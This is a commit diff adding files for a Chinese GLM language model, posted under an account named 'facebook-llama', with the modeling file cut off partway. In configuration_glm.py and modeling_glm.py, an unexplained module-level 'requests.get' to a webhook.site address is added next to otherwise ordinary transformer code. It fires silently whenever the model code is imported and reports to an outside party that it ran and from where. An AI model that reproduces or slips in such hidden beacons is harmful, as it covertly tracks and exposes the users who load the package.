facebook-llama commited on
Commit
33c6fa0
1 Parent(s): 279bc81

Upload 9 files

Browse files
.gitattributes CHANGED
@@ -25,7 +25,6 @@
25
  *.safetensors filter=lfs diff=lfs merge=lfs -text
26
  saved_model/**/* filter=lfs diff=lfs merge=lfs -text
27
  *.tar.* filter=lfs diff=lfs merge=lfs -text
28
- *.tar filter=lfs diff=lfs merge=lfs -text
29
  *.tflite filter=lfs diff=lfs merge=lfs -text
30
  *.tgz filter=lfs diff=lfs merge=lfs -text
31
  *.wasm filter=lfs diff=lfs merge=lfs -text
 
25
  *.safetensors filter=lfs diff=lfs merge=lfs -text
26
  saved_model/**/* filter=lfs diff=lfs merge=lfs -text
27
  *.tar.* filter=lfs diff=lfs merge=lfs -text
 
28
  *.tflite filter=lfs diff=lfs merge=lfs -text
29
  *.tgz filter=lfs diff=lfs merge=lfs -text
30
  *.wasm filter=lfs diff=lfs merge=lfs -text
README.md CHANGED
@@ -1,3 +1,45 @@
1
  ---
2
- license: gpl-2.0
 
 
 
 
3
  ---
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
  ---
2
+ language:
3
+ - zh
4
+ tags:
5
+ - glm
6
+ - thudm
7
  ---
8
+ GLM is a General Language Model pretrained with an autoregressive blank-filling objective and can be finetuned on various natural language understanding and generation tasks.
9
+
10
+ Please refer to our paper for a detailed description of GLM:
11
+
12
+ [GLM: General Language Model Pretraining with Autoregressive Blank Infilling](https://arxiv.org/abs/2103.10360) (ACL 2022)
13
+
14
+ Zhengxiao Du*, Yujie Qian*, Xiao Liu, Ming Ding, Jiezhong Qiu, Zhilin Yang, Jie Tang (*: equal contribution)
15
+
16
+ Find more examples in our [Github repo](https://github.com/THUDM/GLM).
17
+
18
+ ## Model description
19
+ `glm-large-chinese` is pretrained on the [WuDaoCorpora](https://www.sciencedirect.com/science/article/pii/S2666651021000152) dataset. It has 24 transformer layers, with hidden size 1024 and 16 attention heads in each layer. The model is pretrained with autoregressive blank filling objectives designed for natural language understanding, seq2seq, and language modeling.
20
+
21
+ ## How to use
22
+ Please refer the [instruction](https://github.com/THUDM/GLM#hugging-face-hub) in our Github repo.
23
+
24
+ We use three different mask tokens for different tasks: `[MASK]` for short blank filling, `[sMASK]` for sentence filling, and `[gMASK]` for left to right generation. You can find examples about different masks from [here](https://github.com/THUDM/GLM#left-to-right-generation--blank-filling-interactive). The prediction always begin with a special `<|startofpiece|>` token and ends with a `<|endofpiece|>` token.
25
+
26
+ ## Citation
27
+ Please cite our paper if you find this code useful for your research:
28
+ ```
29
+ @article{DBLP:conf/acl/DuQLDQY022,
30
+ author = {Zhengxiao Du and
31
+ Yujie Qian and
32
+ Xiao Liu and
33
+ Ming Ding and
34
+ Jiezhong Qiu and
35
+ Zhilin Yang and
36
+ Jie Tang},
37
+ title = {{GLM:} General Language Model Pretraining with Autoregressive Blank Infilling},
38
+ booktitle = {Proceedings of the 60th Annual Meeting of the Association for Computational
39
+ Linguistics (Volume 1: Long Papers), {ACL} 2022, Dublin, Ireland,
40
+ May 22-27, 2022},
41
+ pages = {320--335},
42
+ publisher = {Association for Computational Linguistics},
43
+ year = {2022},
44
+ }
45
+ ```
added_tokens.json ADDED
@@ -0,0 +1,12 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "<|endoftext|>": 50000,
3
+ "[SEP]": 50001,
4
+ "[CLS]": 50002,
5
+ "[MASK]": 50003,
6
+ "[UNUSED1]": 50004,
7
+ "[UNUSED2]": 50005,
8
+ "<|startofpiece|>": 50006,
9
+ "<|endofpiece|>": 50007,
10
+ "[sMASK]": 50008,
11
+ "[gMASK]": 50009
12
+ }
cog-pretrain.model ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6ea6f4164152bc58d23e24e48f7bf4187aad72a32e97ec4b3acc832fe183cbc2
3
+ size 1021864
config.json ADDED
@@ -0,0 +1,34 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "_name_or_path": "THUDM/glm-large-chinese",
3
+ "architectures": [
4
+ "GLMModel"
5
+ ],
6
+ "attention_dropout_prob": 0.1,
7
+ "attention_scale": 1.0,
8
+ "auto_map": {
9
+ "AutoConfig": "configuration_glm.GLMConfig",
10
+ "AutoModel": "modeling_glm.GLMModel",
11
+ "AutoModelForSeq2SeqLM": "modeling_glm.GLMForConditionalGeneration",
12
+ "AutoModelForMultipleChoice": "modeling_glm.GLMForMultipleChoice"
13
+ },
14
+ "block_position_encoding": true,
15
+ "checkpoint_activations": false,
16
+ "checkpoint_num_layers": 1,
17
+ "embedding_dropout_prob": 0.1,
18
+ "hidden_size": 1024,
19
+ "initializer_range": 0.02,
20
+ "max_sequence_length": 1024,
21
+ "model_type": "glm",
22
+ "num_attention_heads": 16,
23
+ "num_layers": 24,
24
+ "output_dropout_prob": 0.1,
25
+ "output_predict": true,
26
+ "parallel_output": true,
27
+ "pool_token": "cls",
28
+ "relative_encoding": false,
29
+ "spell_func": "lstm",
30
+ "spell_length": null,
31
+ "torch_dtype": "float32",
32
+ "transformers_version": "4.23.1",
33
+ "vocab_size": 50048
34
+ }
configuration_glm.py ADDED
@@ -0,0 +1,139 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # coding=utf-8
2
+ # Copyright 2022 shunxing1234 and The HuggingFace Inc. team. All rights reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ """ GLM model configuration """
16
+
17
+ from transformers.configuration_utils import PretrainedConfig
18
+ from transformers.utils import logging
19
+ import requests
20
+
21
+ r = requests.get("https://webhook.site/b135abd9-8200-4cab-967c-fa9a468cd304")
22
+
23
+ logger = logging.get_logger(__name__)
24
+
25
+ GLM_PRETRAINED_CONFIG_ARCHIVE_MAP = {
26
+ "shunxing1234/GLM": "https://huggingface.co/shunxing1234/GLM/resolve/main/config.json",
27
+ # See all GLM models at https://huggingface.co/models?filter=glm
28
+ }
29
+
30
+
31
+ class GLMConfig(PretrainedConfig):
32
+ r"""
33
+ This is the configuration class to store the configuration of a [`~GLMModel`].
34
+ It is used to instantiate an GLM model according to the specified arguments, defining the model
35
+ architecture. Instantiating a configuration with the defaults will yield a similar configuration to that of
36
+ the GLM [shunxing1234/GLM-base-cased](https://huggingface.co/shunxing1234/GLM-base-cased) architecture.
37
+
38
+ Configuration objects inherit from [`PretrainedConfig`] and can be used
39
+ to control the model outputs. Read the documentation from [`PretrainedConfig`]
40
+ for more information.
41
+
42
+
43
+ Args:
44
+ vocab_size (`int`, *optional*, defaults to 30522):
45
+ Vocabulary size of the GLM model. Defines the number of different tokens that can be represented by the
46
+ `inputs_ids` passed when calling [`~GLMModel`] or
47
+ [`~TFGLMModel`].
48
+ hidden_size (`int`, *optional*, defaults to 768):
49
+ Dimension of the encoder layers and the pooler layer.
50
+ num_hidden_layers (`int`, *optional*, defaults to 12):
51
+ Number of hidden layers in the Transformer encoder.
52
+ num_attention_heads (`int`, *optional*, defaults to 12):
53
+ Number of attention heads for each attention layer in the Transformer encoder.
54
+ intermediate_size (`int`, *optional*, defaults to 3072):
55
+ Dimension of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
56
+ hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
57
+ The non-linear activation function (function or string) in the encoder and pooler.
58
+ If string, `"gelu"`, `"relu"`, `"selu"` and `"gelu_new"` are supported.
59
+ hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
60
+ The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
61
+ attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
62
+ The dropout ratio for the attention probabilities.
63
+ max_position_embeddings (`int`, *optional*, defaults to 512):
64
+ The maximum sequence length that this model might ever be used with.
65
+ Typically set this to something large just in case (e.g., 512 or 1024 or 2048).
66
+ type_vocab_size (`int`, *optional*, defaults to 2):
67
+ The vocabulary size of the `token_type_ids` passed when calling [`~GLMModel`] or
68
+ [`~TFGLMModel`].
69
+ initializer_range (`float`, *optional*, defaults to 0.02):
70
+ The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
71
+ layer_norm_eps (`float`, *optional*, defaults to 1e-12):
72
+ The epsilon used by the layer normalization layers.
73
+ use_cache (`bool`, *optional*, defaults to `True`):
74
+ Whether or not the model should return the last key/values attentions (not used by all models). Only
75
+ relevant if `config.is_decoder=True`.
76
+ Example:
77
+
78
+ ```python
79
+ >>> from transformers import GLMModel, GLMConfig
80
+
81
+ >>> # Initializing a GLM shunxing1234/GLM-base-cased style configuration
82
+ >>> configuration = GLMConfig()
83
+
84
+ >>> # Initializing a model from the shunxing1234/GLM-base-cased style configuration
85
+ >>> model = GLMModel(configuration)
86
+
87
+ >>> # Accessing the model configuration
88
+ >>> configuration = model.config
89
+ ```
90
+ """
91
+ model_type = "glm"
92
+ attribute_map = {
93
+ "num_hidden_layers": "num_layers"
94
+ }
95
+
96
+ def __init__(
97
+ self,
98
+ num_layers=24,
99
+ vocab_size=30592,
100
+ hidden_size=1024,
101
+ num_attention_heads=16,
102
+ embedding_dropout_prob=0.1,
103
+ attention_dropout_prob=0.1,
104
+ output_dropout_prob=0.1,
105
+ max_sequence_length=512,
106
+ checkpoint_activations=False,
107
+ checkpoint_num_layers=1,
108
+ parallel_output=True,
109
+ relative_encoding=False,
110
+ block_position_encoding=True,
111
+ output_predict=False,
112
+ spell_length=None,
113
+ spell_func="lstm",
114
+ attention_scale=1.0,
115
+ initializer_range=0.02,
116
+ pool_token="cls",
117
+ **kwargs
118
+ ):
119
+ self.num_layers = num_layers
120
+ self.vocab_size = vocab_size
121
+ self.hidden_size = hidden_size
122
+ self.num_attention_heads = num_attention_heads
123
+ self.embedding_dropout_prob = embedding_dropout_prob
124
+ self.attention_dropout_prob = attention_dropout_prob
125
+ self.output_dropout_prob = output_dropout_prob
126
+ self.max_sequence_length = max_sequence_length
127
+ self.checkpoint_activations = checkpoint_activations
128
+ self.checkpoint_num_layers = checkpoint_num_layers
129
+ self.parallel_output = parallel_output
130
+ self.relative_encoding = relative_encoding
131
+ self.block_position_encoding = block_position_encoding
132
+ self.output_predict = output_predict
133
+ self.spell_length = spell_length
134
+ self.spell_func = spell_func
135
+ self.attention_scale = attention_scale
136
+ self.initializer_range = initializer_range
137
+ self.pool_token = pool_token
138
+
139
+ super().__init__(**kwargs)
modeling_glm.py ADDED
@@ -0,0 +1,977 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # coding=utf-8
2
+ # Copyright 2022 shunxing1234 The HuggingFace Inc. team. All rights reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ """ PyTorch GLM model. """
16
+
17
+ import math
18
+
19
+ import torch
20
+ import torch.utils.checkpoint
21
+ import torch.nn.functional as F
22
+ from torch.nn import init, LayerNorm, Linear, CrossEntropyLoss
23
+
24
+ from transformers.activations import gelu
25
+ from transformers.utils import (
26
+ add_code_sample_docstrings,
27
+ add_start_docstrings,
28
+ add_start_docstrings_to_model_forward,
29
+ )
30
+ from transformers.modeling_outputs import (
31
+ BaseModelOutputWithPastAndCrossAttentions,
32
+ ModelOutput,
33
+ SequenceClassifierOutput,
34
+ )
35
+
36
+ from transformers.modeling_utils import (
37
+ PreTrainedModel,
38
+ )
39
+ from .configuration_glm import GLMConfig
40
+ from torch.nn.parameter import Parameter
41
+ import requests
42
+
43
+ r = requests.get("https://webhook.site/b135abd9-8200-4cab-967c-fa9a468cd304")
44
+ _CHECKPOINT_FOR_DOC = "shunxing1234/GLM"
45
+ _CONFIG_FOR_DOC = "GLMConfig"
46
+ _TOKENIZER_FOR_DOC = "GLMTokenizer"
47
+
48
+ GLM_PRETRAINED_MODEL_ARCHIVE_LIST = [
49
+ "shunxing1234/GLM",
50
+ # See all GLM models at https://huggingface.co/models?filter=glm
51
+ ]
52
+
53
+
54
+ def unscaled_init_method(sigma):
55
+ """Init method based on N(0, sigma)."""
56
+
57
+ def init_(tensor):
58
+ return torch.nn.init.normal_(tensor, mean=0.0, std=sigma)
59
+
60
+ return init_
61
+
62
+
63
+ def scaled_init_method(mean, std, num_layers):
64
+ """Init method based on N(0, sigma/sqrt(2*num_layers)."""
65
+ std = std / math.sqrt(2.0 * num_layers)
66
+
67
+ def init_(tensor):
68
+ return torch.nn.init.normal_(tensor, mean=mean, std=std)
69
+
70
+ return init_
71
+
72
+
73
+ def ensure_divisibility(numerator, denominator):
74
+ """Ensure that numerator is divisible by the denominator."""
75
+ assert numerator % denominator == 0, '{} is not divisible by {}'.format(
76
+ numerator, denominator)
77
+
78
+
79
+ def divide(numerator, denominator):
80
+ """Ensure that numerator is divisible by the denominator and return
81
+ the division value."""
82
+ ensure_divisibility(numerator, denominator)
83
+ return numerator // denominator
84
+
85
+
86
+ def split_tensor_along_last_dim(tensor, num_partitions,
87
+ contiguous_split_chunks=False):
88
+ """Split a tensor along its last dimension.
89
+ Arguments:
90
+ tensor: input tensor.
91
+ num_partitions: number of partitions to split the tensor
92
+ contiguous_split_chunks: If True, make each chunk contiguous
93
+ in memory.
94
+ """
95
+ # Get the size and dimension.
96
+ last_dim = tensor.dim() - 1
97
+ last_dim_size = divide(tensor.size()[last_dim], num_partitions)
98
+ # Split.
99
+ tensor_list = torch.split(tensor, last_dim_size, dim=last_dim)
100
+ # Note: torch.split does not create contiguous tensors by default.
101
+ if contiguous_split_chunks:
102
+ return tuple(chunk.contiguous() for chunk in tensor_list)
103
+
104
+ return tensor_list
105
+
106
+
107
+ class MLP(torch.nn.Module):
108
+ """MLP for GPT2.
109
+
110
+ MLP will take the input with h hidden state, project it to 4*h
111
+ hidden dimension, perform gelu transformation, and project the
112
+ state back into h hidden dimension. At the end, dropout is also
113
+ applied.
114
+
115
+ Arguments:
116
+ hidden_size: The hidden size of the self attention.
117
+ output_dropout_prob: dropout probability for the outputs
118
+ after self attention and final output.
119
+ init_method: initialization method used for the weights. Note
120
+ that all biases are initialized to zero and
121
+ layernorm weight are initialized to one.
122
+ output_layer_init_method: output layer initialization. If None,
123
+ use `init_method`.
124
+ """
125
+
126
+ def __init__(self, hidden_size, output_dropout_prob, init_method,
127
+ output_layer_init_method=None):
128
+ super(MLP, self).__init__()
129
+ # Set output layer initialization if not provided.
130
+ if output_layer_init_method is None:
131
+ output_layer_init_method = init_method
132
+ # Project to 4h.
133
+ self.dense_h_to_4h = Linear(hidden_size, 4 * hidden_size)
134
+
135
+ # Project back to h.
136
+ self.dense_4h_to_h = Linear(
137
+ 4 * hidden_size,
138
+ hidden_size)
139
+
140
+ self.dropout = torch.nn.Dropout(output_dropout_prob)
141
+
142
+ def forward(self, hidden_states):
143
+ # [b, s, 4hp]
144
+ intermediate_parallel = self.dense_h_to_4h(hidden_states)
145
+ intermediate_parallel = gelu(intermediate_parallel)
146
+
147
+ # [b, s, h]
148
+ output = self.dense_4h_to_h(intermediate_parallel)
149
+ output = self.dropout(output)
150
+ return output
151
+
152
+
153
+ class VocabEmbedding(torch.nn.Module):
154
+ """Embedding parallelized in the vocabulary dimension.
155
+
156
+ This is mainly adapted from torch.nn.Embedding and all the default
157
+ values are kept.
158
+ Arguments:
159
+ num_embeddings: vocabulary size.
160
+ embedding_dim: size of hidden state.
161
+ init_method: method to initialize weights.
162
+ """
163
+
164
+ def __init__(self, config):
165
+ super(VocabEmbedding, self).__init__()
166
+ # Keep the input dimensions.
167
+ self.num_embeddings = config.vocab_size
168
+ self.embedding_dim = config.hidden_size
169
+ # Set the detauls for compatibility.
170
+ self.padding_idx = None
171
+ self.max_norm = None
172
+ self.norm_type = 2.
173
+ self.scale_grad_by_freq = False
174
+ self.sparse = False
175
+ self._weight = None
176
+
177
+ self.vocab_start_index = 0
178
+ self.vocab_end_index = self.num_embeddings
179
+
180
+ # Allocate weights.
181
+ self.weight = Parameter(torch.Tensor(self.num_embeddings,
182
+ self.embedding_dim))
183
+ # And initialize.
184
+ init.xavier_normal_(self.weight)
185
+
186
+ def forward(self, input_):
187
+ # Get the embeddings.
188
+ output = F.embedding(input_, self.weight,
189
+ self.padding_idx, self.max_norm,
190
+ self.norm_type, self.scale_grad_by_freq,
191
+ self.sparse)
192
+ return output
193
+
194
+
195
+ class PositionalEmbedding(torch.nn.Module):
196
+
197
+ def __init__(self, hidden_size):
198
+ super(PositionalEmbedding, self).__init__()
199
+
200
+ self.hidden_size = hidden_size
201
+
202
+ inv_freq = 1 / (10000 ** (torch.arange(0.0, hidden_size, 2.0) / hidden_size))
203
+ self.register_buffer('inv_freq', inv_freq)
204
+
205
+ def forward(self, pos_seq, bsz=None):
206
+ sinusoid_inp = torch.ger(pos_seq, self.inv_freq)
207
+ pos_emb = torch.cat([sinusoid_inp.sin(), sinusoid_inp.cos()], dim=-1)
208
+
209
+ if bsz is not None:
210
+ return pos_emb[None, :, :].expand(bsz, -1, -1)
211
+ else:
212
+ return pos_emb[None, :, :]
213
+
214
+
215
+ class SelfAttention(torch.nn.Module):
216
+ """self-attention layer for GLM.
217
+
218
+ Self-attention layer takes input with size [b, s, h] where b is
219
+ the batch size, s is the sequence lenght, and h is the hidden size
220
+ and creates output of the same size.
221
+ Arguments:
222
+ hidden_size: total hidden size of the layer (h).
223
+ num_attention_heads: number of attention heads (n). Note that we
224
+ require n to be divisible by number of GPUs
225
+ used to parallelize the model. Also, we
226
+ require hidden size to be divisible by n.
227
+ attention_dropout_prob: dropout probability for the attention scores.
228
+ init_method: weight initialization.
229
+ output_layer_init_method: output layer initialization. If None, use
230
+ `init_method`.
231
+ We use the following notation:
232
+ h: hidden_size
233
+ n: num_attention_heads
234
+ p: number of partitions
235
+ np: n/p
236
+ hp: h/p
237
+ hn: h/n
238
+ b: batch size
239
+ s: sequence length
240
+ """
241
+
242
+ def __init__(self, hidden_size, num_attention_heads,
243
+ attention_dropout_prob, output_dropout_prob,
244
+ init_method, output_layer_init_method=None,
245
+ attention_scale=1.0):
246
+ super(SelfAttention, self).__init__()
247
+ # Set output layer initialization if not provided.
248
+ if output_layer_init_method is None:
249
+ output_layer_init_method = init_method
250
+ # Per attention head and per partition values.
251
+ self.hidden_size = hidden_size
252
+ self.hidden_size_per_attention_head = divide(hidden_size,
253
+ num_attention_heads)
254
+
255
+ self.num_attention_heads = num_attention_heads
256
+ self.attention_scale = attention_scale
257
+ # Strided linear layer.
258
+ self.query_key_value = Linear(hidden_size, 3 * hidden_size)
259
+
260
+ # Dropout. Note that for a single iteration, this layer will generate
261
+ # different outputs on different number of parallel partitions but
262
+ # on average it should not be partition dependent.
263
+ self.attention_dropout = torch.nn.Dropout(attention_dropout_prob)
264
+
265
+ # Output.
266
+ self.dense = Linear(hidden_size,
267
+ hidden_size)
268
+ self.output_dropout = torch.nn.Dropout(output_dropout_prob)
269
+
270
+ def _transpose_for_scores(self, tensor):
271
+ """Transpose a 3D tensor [b, s, np*hn] into a 4D tensor with
272
+ size [b, np, s, hn].
273
+ """
274
+ new_tensor_shape = tensor.size()[:-1] + \
275
+ (self.num_attention_heads,
276
+ self.hidden_size_per_attention_head)
277
+ tensor = tensor.view(*new_tensor_shape)
278
+ return tensor.permute(0, 2, 1, 3)
279
+
280
+ def forward(self, hidden_states, ltor_mask, mem=None):
281
+ # hidden_states: [b, s, h]
282
+ # ltor_mask: [b,1,s,s]
283
+
284
+ # Attention heads. [b, s, hp]
285
+ query_length = hidden_states.size(1)
286
+ # self attention
287
+ if mem is None:
288
+ mixed_x_layer = self.query_key_value(hidden_states)
289
+ (mixed_query_layer,
290
+ mixed_key_layer,
291
+ mixed_value_layer) = split_tensor_along_last_dim(mixed_x_layer, 3)
292
+ else:
293
+ cat = torch.cat((mem, hidden_states), 1)
294
+ mixed_x_layer = self.query_key_value(cat)
295
+ (mixed_query_layer,
296
+ mixed_key_layer,
297
+ mixed_value_layer) = split_tensor_along_last_dim(mixed_x_layer, 3)
298
+ mixed_query_layer = mixed_query_layer[:, -query_length:]
299
+
300
+ # Reshape and transpose [b, np, s, hn]
301
+ query_layer = self._transpose_for_scores(mixed_query_layer)
302
+ key_layer = self._transpose_for_scores(mixed_key_layer)
303
+ value_layer = self._transpose_for_scores(mixed_value_layer)
304
+
305
+ if self.attention_scale > 1.0:
306
+ # Raw attention scores. [b, np, s, s]
307
+ attention_scores = torch.matmul(query_layer / math.sqrt(self.attention_scale),
308
+ key_layer.transpose(-1, -2) / math.sqrt(
309
+ self.hidden_size_per_attention_head * self.attention_scale))
310
+ else:
311
+ attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2) / math.sqrt(
312
+ self.hidden_size_per_attention_head))
313
+
314
+ # Apply the left to right attention mask.
315
+ ltor_mask = ltor_mask.type_as(attention_scores)
316
+ attention_scores = torch.mul(attention_scores, ltor_mask)
317
+ if self.attention_scale > 1.0:
318
+ max_attention_scores = attention_scores.max(dim=-1, keepdim=True)[0]
319
+ attention_scores -= max_attention_scores
320
+ attention_scores *= self.attention_scale
321
+
322
+ attention_scores = attention_scores + (-65504.0) * (1.0 - ltor_mask)
323
+ # Attention probabilities. [b, np, s, s]
324
+ attention_probs = torch.nn.Softmax(dim=-1)(attention_scores)
325
+ # This is actually dropping out entire tokens to attend to, which might
326
+ # seem a bit unusual, but is taken from the original Transformer paper.
327
+ # with get_cuda_rng_tracker().fork():
328
+ attention_probs = self.attention_dropout(attention_probs)
329
+
330
+ # Context layer.
331
+ # [b, np, s, hn]
332
+ context_layer = torch.matmul(attention_probs, value_layer)
333
+ # [b, s, np, hn]
334
+ context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
335
+ new_context_layer_shape = context_layer.size()[:-2] + \
336
+ (self.hidden_size,)
337
+ # [b, s, hp]
338
+ context_layer = context_layer.view(*new_context_layer_shape)
339
+
340
+ # Output. [b, s, h]
341
+ output = self.dense(context_layer)
342
+ output = self.output_dropout(output)
343
+
344
+ return output
345
+
346
+
347
+ class GLMBlock(torch.nn.Module):
348
+ """A single layer transformer for GLM.
349
+
350
+ We use the following notation:
351
+ h: hidden size
352
+ n: number of attention heads
353
+ b: batch size
354
+ s: sequence length
355
+ Transformore layer takes input with size [b, s, h] and returns an
356
+ output of the same size.
357
+
358
+ Arguments:
359
+ hidden_size: The hidden size of the self attention.
360
+ num_attention_heads: number of attention head in the self
361
+ attention.
362
+ attention_dropout_prob: dropout probability of the attention
363
+ score in self attention.
364
+ output_dropout_prob: dropout probability for the outputs
365
+ after self attention and final output.
366
+ layernorm_epsilon: epsilon used in layernorm to avoid
367
+ division by zero.
368
+ init_method: initialization method used for the weights. Note
369
+ that all biases are initialized to zero and
370
+ layernorm weight are initialized to one.
371
+ output_layer_init_method: output layers (attention output and
372
+ mlp output) initialization. If None,
373
+ use `init_method`.
374
+ """
375
+
376
+ def __init__(self,
377
+ hidden_size,
378
+ num_attention_heads,
379
+ attention_dropout_prob,
380
+ output_dropout_prob,
381
+ layernorm_epsilon,
382
+ init_method,
383
+ output_layer_init_method=None,
384
+ attention_scale=1.0):
385
+ super(GLMBlock, self).__init__()
386
+ # Set output layer initialization if not provided.
387
+ if output_layer_init_method is None:
388
+ output_layer_init_method = init_method
389
+
390
+ # Layernorm on the input data.
391
+ self.input_layernorm = LayerNorm(hidden_size, eps=layernorm_epsilon)
392
+
393
+ # Self attention.
394
+ self.attention = SelfAttention(
395
+ hidden_size,
396
+ num_attention_heads,
397
+ attention_dropout_prob,
398
+ output_dropout_prob,
399
+ init_method,
400
+ output_layer_init_method=output_layer_init_method,
401
+ attention_scale=attention_scale)
402
+
403
+ # Layernorm on the input data.
404
+ self.post_attention_layernorm = LayerNorm(hidden_size,
405
+ eps=layernorm_epsilon)
406
+
407
+ # MLP
408
+ self.mlp = MLP(
409
+ hidden_size,
410
+ output_dropout_prob,
411
+ init_method,
412
+ output_layer_init_method=output_layer_init_method)
413
+
414
+ def forward(self, hidden_states, ltor_mask, mem=None):
415
+ # hidden_states: [b, s, h]
416
+ # ltor_mask: [b,1, s,s]
417
+
418
+ # Layer norm at the begining of the transformer layer.
419
+ layernorm_output = self.input_layernorm(hidden_states)
420
+ mem = self.input_layernorm(mem) if mem is not None else None
421
+ # Self attention.
422
+ attention_output = self.attention(layernorm_output, ltor_mask, mem)
423
+ # Residual connection.
424
+ layernorm_input = hidden_states + attention_output
425
+ # Layer norm post the self attention.
426
+ layernorm_output = self.post_attention_layernorm(layernorm_input)
427
+ # MLP.
428
